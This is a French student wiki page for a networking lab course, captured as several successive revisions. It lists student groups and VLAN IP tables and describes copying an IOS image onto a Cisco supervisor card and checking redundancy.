-> 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)<br />
-> 2ème carte: OS absent <br />
<br />
Etape 2: Copie du fichier d'OS<br />
<br />
[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]<br />
<br />
Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la premiere carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxieme carte de supervision.<br />
<br />
copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&éé-33.SXI6.bin disk0:<br />
<br />
Etape 3: Reboot de la deuxième carte<br />
<br />
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. <br />
<br />
boot<br />
sh ver <br />
<br />
Etape 4: Vérificaton de la redondance<br />
<br />
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&diff=52459TP sysres IMA2a5 2020/20212020-09-25T08:39:39Z<p>Tvitteco : /* Table d'adressage IP */</p>
<hr />
<div>== Introduction ==<br />
<br />
Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.<br />
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]<br />
<br />
== Répartition des binômes ==<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elèves <br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]<br />
| SAWICZ Lionel<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]<br />
| HERBOMEL Guillaume<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]<br />
| CRAMETTE Samuel<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]<br />
| AVEZ Thibaut<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]<br />
| GLAINE Alexandre<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]<br />
| VITTECOQ Thomas<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]<br />
| CHENU Léna <br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]<br />
| COULON Nathan<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]<br />
| DJAMBA Crispin<br />
|}<br />
<br />
== Architecture matérielle ==<br />
[[Fichier:Architecture-MA2a5-2020_2021.JPG]]<br />
<br />
== Table d'adressage IP ==<br />
<br />
=== Table du vlan1 ===<br />
<br />
{| class="wikitable"<br />
!Nom de l'appareil !! IP<br />
|-<br />
|6509<br />
|10.60.0.1<br />
|-<br />
|3560 E<br />
|10.60.0.2<br />
|-<br />
|mask<br />
|255.255.255.0<br />
|}<br />
<br />
=== Table du vlan2 ===<br />
<br />
{| class="wikitable"<br />
!Nom de l'appareil !! IP !! nom Vm<br />
|-<br />
|6509<br />
|193.48.57.61<br />
|X<br />
|-<br />
|3560 E<br />
|193.48.57.62<br />
|X<br />
|-<br />
|routeur virtuel<br />
|193.48.57.63<br />
|X<br />
|-<br />
|Lionel<br />
|193.48.57.64<br />
|Rafale<br />
|-<br />
|Guillaume<br />
|193.48.57.65<br />
|X<br />
|-<br />
|Samuel<br />
|193.48.57.66<br />
|X<br />
|-<br />
|Thibaut<br />
|193.48.57.67<br />
|Falcon<br />
|-<br />
|Alexandre<br />
|193.48.57.68<br />
|Mirage<br />
|-<br />
|Thomas<br />
|193.48.57.69<br />
|Alpha_jet<br />
|-<br />
|Crispin<br />
|193.48.57.70<br />
|X<br />
|-<br />
|Léna<br />
|193.48.57.71<br />
|X<br />
|-<br />
|Nathan<br />
|193.48.57.72<br />
|X<br />
|-<br />
|ISR<br />
|193.48.57.73<br />
|X<br />
|-<br />
|Mask<br />
|255.255.255.240<br />
|X<br />
|-<br />
|}<br />
<br />
<br />
{| class="wikitable"<br />
!Nom de l'appareil !! IP<br />
|-<br />
|6509<br />
|192.168.222.2<br />
|-<br />
|3560 E<br />
|1192.168.222.1<br />
|-<br />
|mask<br />
|255.255.255.248<br />
|}<br />
<br />
=== Table générale ===<br />
<br />
{| class="wikitable"<br />
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel<br />
|-<br />
|Xen<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 1<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 2<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 3<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 4<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 5<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 6<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 7<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 8<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 9<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Interconnexion<br />
|X<br />
|X<br />
|Router1 : X // Router2 : X // Ecole : X<br />
|X<br />
|X<br />
|<br />
|-<br />
|}<br />
<br />
=== IP des VMs ===<br />
<br />
{| class="wikitable"<br />
!Nom de la VM !! IP de la VM<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|}<br />
<br />
<br />
=== Cartes de supervision ===<br />
<br />
Problèmatique: Configuration et installation des OS des cartes de supervision<br />
<br />
Etape 1: Vérifier l'existance d'OS sur les deux cartes. <br />
<br />
<br />
Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes. <br />
-> 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)<br />
-> 2ème carte: OS absent <br />
<br />
Etape 2: Copie du fichier d'OS<br />
<br />
[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]<br />
<br />
Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la premiere carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxieme carte de supervision.<br />
<br />
copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&éé-33.SXI6.bin disk0:<br />
<br />
Etape 3: Reboot de la deuxième carte<br />
<br />
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. <br />
<br />
boot<br />
sh ver <br />
<br />
Etape 4: Vérificaton de la redondance<br />
<br />
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&diff=52455TP sysres IMA2a5 2020/20212020-09-25T08:35:39Z<p>Tvitteco : /* Table du vlan2 */</p>
<hr />
<div>== Introduction ==<br />
<br />
Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.<br />
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]<br />
<br />
== Répartition des binômes ==<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elèves <br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]<br />
| SAWICZ Lionel<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]<br />
| HERBOMEL Guillaume<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]<br />
| CRAMETTE Samuel<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]<br />
| AVEZ Thibaut<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]<br />
| GLAINE Alexandre<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]<br />
| VITTECOQ Thomas<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]<br />
| CHENU Léna <br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]<br />
| COULON Nathan<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]<br />
| DJAMBA Crispin<br />
|}<br />
<br />
== Architecture matérielle ==<br />
[[Fichier:Architecture-MA2a5-2020_2021.JPG]]<br />
<br />
== Table d'adressage IP ==<br />
=== Table du vlan2 ===<br />
<br />
{| class="wikitable"<br />
!Nom de l'appareil !! IP !! nom Vm<br />
|-<br />
|6509<br />
|193.48.57.61<br />
|X<br />
|-<br />
|3560 E<br />
|193.48.57.62<br />
|X<br />
|-<br />
|routeur virtuel<br />
|193.48.57.63<br />
|X<br />
|-<br />
|Lionel<br />
|193.48.57.64<br />
|X<br />
|-<br />
|Guillaume<br />
|193.48.57.65<br />
|X<br />
|-<br />
|Samuel<br />
|193.48.57.66<br />
|X<br />
|-<br />
|Thibaut<br />
|193.48.57.67<br />
|X<br />
|-<br />
|Alexandre<br />
|193.48.57.68<br />
|X<br />
|-<br />
|Thomas<br />
|193.48.57.69<br />
|Alpha_jet<br />
|-<br />
|Crispin<br />
|193.48.57.70<br />
|X<br />
|-<br />
|Léna<br />
|193.48.57.71<br />
|X<br />
|-<br />
|Nathan<br />
|193.48.57.72<br />
|X<br />
|-<br />
|ISR<br />
|193.48.57.73<br />
|X<br />
|-<br />
|}<br />
<br />
=== Table générale ===<br />
<br />
{| class="wikitable"<br />
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel<br />
|-<br />
|Xen<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 1<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 2<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 3<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 4<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 5<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 6<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 7<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 8<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 9<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Interconnexion<br />
|X<br />
|X<br />
|Router1 : X // Router2 : X // Ecole : X<br />
|X<br />
|X<br />
|<br />
|-<br />
|}<br />
<br />
=== IP des VMs ===<br />
<br />
{| class="wikitable"<br />
!Nom de la VM !! IP de la VM<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|}<br />
<br />
<br />
=== Cartes de supervision ===<br />
<br />
Problèmatique: Configuration et installation des OS des cartes de supervision<br />
<br />
Etape 1: Vérifier l'existance d'OS sur les deux cartes. <br />
<br />
<br />
Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes. <br />
-> 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)<br />
-> 2ème carte: OS absent <br />
<br />
Etape 2: Copie du fichier d'OS<br />
<br />
[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]<br />
<br />
Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la premiere carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxieme carte de supervision.<br />
<br />
copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&éé-33.SXI6.bin disk0:<br />
<br />
Etape 3: Reboot de la deuxième carte<br />
<br />
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. <br />
<br />
boot<br />
sh ver <br />
<br />
Etape 4: Vérificaton de la redondance<br />
<br />
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&diff=52454TP sysres IMA2a5 2020/20212020-09-25T08:34:56Z<p>Tvitteco : /* Table du vlan2 */</p>
<hr />
<div>== Introduction ==<br />
<br />
Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.<br />
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]<br />
<br />
== Répartition des binômes ==<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elèves <br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]<br />
| SAWICZ Lionel<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]<br />
| HERBOMEL Guillaume<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]<br />
| CRAMETTE Samuel<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]<br />
| AVEZ Thibaut<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]<br />
| GLAINE Alexandre<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]<br />
| VITTECOQ Thomas<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]<br />
| CHENU Léna <br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]<br />
| COULON Nathan<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]<br />
| DJAMBA Crispin<br />
|}<br />
<br />
== Architecture matérielle ==<br />
[[Fichier:Architecture-MA2a5-2020_2021.JPG]]<br />
<br />
== Table d'adressage IP ==<br />
=== Table du vlan2 ===<br />
<br />
{| class="wikitable"<br />
!Nom de l'appareil !! IP !! nom Vm<br />
|-<br />
|6509<br />
|193.48.57.61<br />
|X<br />
|-<br />
|3560 E<br />
|193.48.57.62<br />
|X<br />
|-<br />
|routeur virtuel<br />
|193.48.57.63<br />
|X<br />
|-<br />
|Lionel<br />
|193.48.57.64<br />
|X<br />
|-<br />
|Guillaume<br />
|193.48.57.65<br />
|X<br />
|-<br />
|Samuel<br />
|193.48.57.66<br />
|X<br />
|-<br />
|Thibaut<br />
|193.48.57.67<br />
|X<br />
|-<br />
|Alexandre<br />
|193.48.57.68<br />
|X<br />
|-<br />
|Thomas<br />
|193.48.57.69<br />
|X<br />
|-<br />
|Crispin<br />
|193.48.57.70<br />
|X<br />
|-<br />
|Léna<br />
|193.48.57.71<br />
|X<br />
|-<br />
|Nathan<br />
|193.48.57.72<br />
|X<br />
|-<br />
|ISR<br />
|193.48.57.73<br />
|X<br />
|-<br />
|}<br />
<br />
=== Table générale ===<br />
<br />
{| class="wikitable"<br />
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel<br />
|-<br />
|Xen<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 1<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 2<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 3<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 4<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 5<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 6<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 7<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 8<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 9<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Interconnexion<br />
|X<br />
|X<br />
|Router1 : X // Router2 : X // Ecole : X<br />
|X<br />
|X<br />
|<br />
|-<br />
|}<br />
<br />
=== IP des VMs ===<br />
<br />
{| class="wikitable"<br />
!Nom de la VM !! IP de la VM<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|}<br />
<br />
<br />
=== Cartes de supervision ===<br />
<br />
Problèmatique: Configuration et installation des OS des cartes de supervision<br />
<br />
Etape 1: Vérifier l'existance d'OS sur les deux cartes. <br />
<br />
<br />
Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes. <br />
-> 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)<br />
-> 2ème carte: OS absent <br />
<br />
Etape 2: Copie du fichier d'OS<br />
<br />
[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]<br />
<br />
Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la premiere carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxieme carte de supervision.<br />
<br />
copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&éé-33.SXI6.bin disk0:<br />
<br />
Etape 3: Reboot de la deuxième carte<br />
<br />
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. <br />
<br />
boot<br />
sh ver <br />
<br />
Etape 4: Vérificaton de la redondance<br />
<br />
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&diff=52453TP sysres IMA2a5 2020/20212020-09-25T08:33:47Z<p>Tvitteco : /* Table d'adressage IP */</p>
<hr />
<div>== Introduction ==<br />
<br />
Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.<br />
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]<br />
<br />
== Répartition des binômes ==<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elèves <br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]<br />
| SAWICZ Lionel<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]<br />
| HERBOMEL Guillaume<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]<br />
| CRAMETTE Samuel<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]<br />
| AVEZ Thibaut<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]<br />
| GLAINE Alexandre<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]<br />
| VITTECOQ Thomas<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]<br />
| CHENU Léna <br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]<br />
| COULON Nathan<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]<br />
| DJAMBA Crispin<br />
|}<br />
<br />
== Architecture matérielle ==<br />
[[Fichier:Architecture-MA2a5-2020_2021.JPG]]<br />
<br />
== Table d'adressage IP ==<br />
=== Table du vlan2 ===<br />
<br />
{| class="wikitable"<br />
!Nom de l'appareil !! IP<br />
|-<br />
|6509<br />
|193.48.57.61<br />
|-<br />
|3560 E<br />
|193.48.57.62<br />
|-<br />
|routeur virtuel<br />
|193.48.57.63<br />
|-<br />
|Lionel<br />
|193.48.57.64<br />
|-<br />
|Guillaume<br />
|193.48.57.65<br />
|-<br />
|Samuel<br />
|193.48.57.66<br />
|-<br />
|Thibaut<br />
|193.48.57.67<br />
|-<br />
|Alexandre<br />
|193.48.57.68<br />
|-<br />
|Thomas<br />
|193.48.57.69<br />
|-<br />
|Crispin<br />
|193.48.57.70<br />
|-<br />
|Léna<br />
|193.48.57.71<br />
|-<br />
|Nathan<br />
|193.48.57.72<br />
|-<br />
|ISR<br />
|193.48.57.73<br />
|-<br />
|}<br />
<br />
=== Table générale ===<br />
<br />
{| class="wikitable"<br />
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel<br />
|-<br />
|Xen<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 1<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 2<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 3<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 4<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 5<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 6<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 7<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 8<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Groupe 9<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|X<br />
|-<br />
|Interconnexion<br />
|X<br />
|X<br />
|Router1 : X // Router2 : X // Ecole : X<br />
|X<br />
|X<br />
|<br />
|-<br />
|}<br />
<br />
=== IP des VMs ===<br />
<br />
{| class="wikitable"<br />
!Nom de la VM !! IP de la VM<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|X<br />
|X<br />
|-<br />
|}<br />
<br />
<br />
=== Cartes de supervision ===<br />
<br />
Problèmatique: Configuration et installation des OS des cartes de supervision<br />
<br />
Etape 1: Vérifier l'existance d'OS sur les deux cartes. <br />
<br />
<br />
Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes. <br />
-> 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)<br />
-> 2ème carte: OS absent <br />
<br />
Etape 2: Copie du fichier d'OS<br />
<br />
[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]<br />
<br />
Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la premiere carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxieme carte de supervision.<br />
<br />
copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&éé-33.SXI6.bin disk0:<br />
<br />
Etape 3: Reboot de la deuxième carte<br />
<br />
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. <br />
<br />
boot<br />
sh ver <br />
<br />
Etape 4: Vérificaton de la redondance<br />
<br />
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&diff=52427TP sysres IMA2a5 2020/20212020-09-24T06:43:32Z<p>Tvitteco : </p>
<hr />
<div>== Répartition des binômes ==<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elèves <br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]<br />
| SAWICZ Lionel<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]<br />
| NOM Prénom<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]<br />
| NOM Prénom<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]<br />
| NOM Prénom<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]<br />
| GLAINE Alexandre<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]<br />
| VITTECOQ Thomas<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]<br />
| CHENU Léna <br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]<br />
| COULON Nathan<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]<br />
| NOM Prénom<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G10 | Cahier groupe n°10]]<br />
| NOM Prénom<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G11 | Cahier groupe n°11]]<br />
| NOM Prénom<br />
|-<br />
| [[ TP sysres IMA2a5 2020/2021 G12 | Cahier groupe n°12]]<br />
| NOM Prénom<br />
|}</div>Tvitteco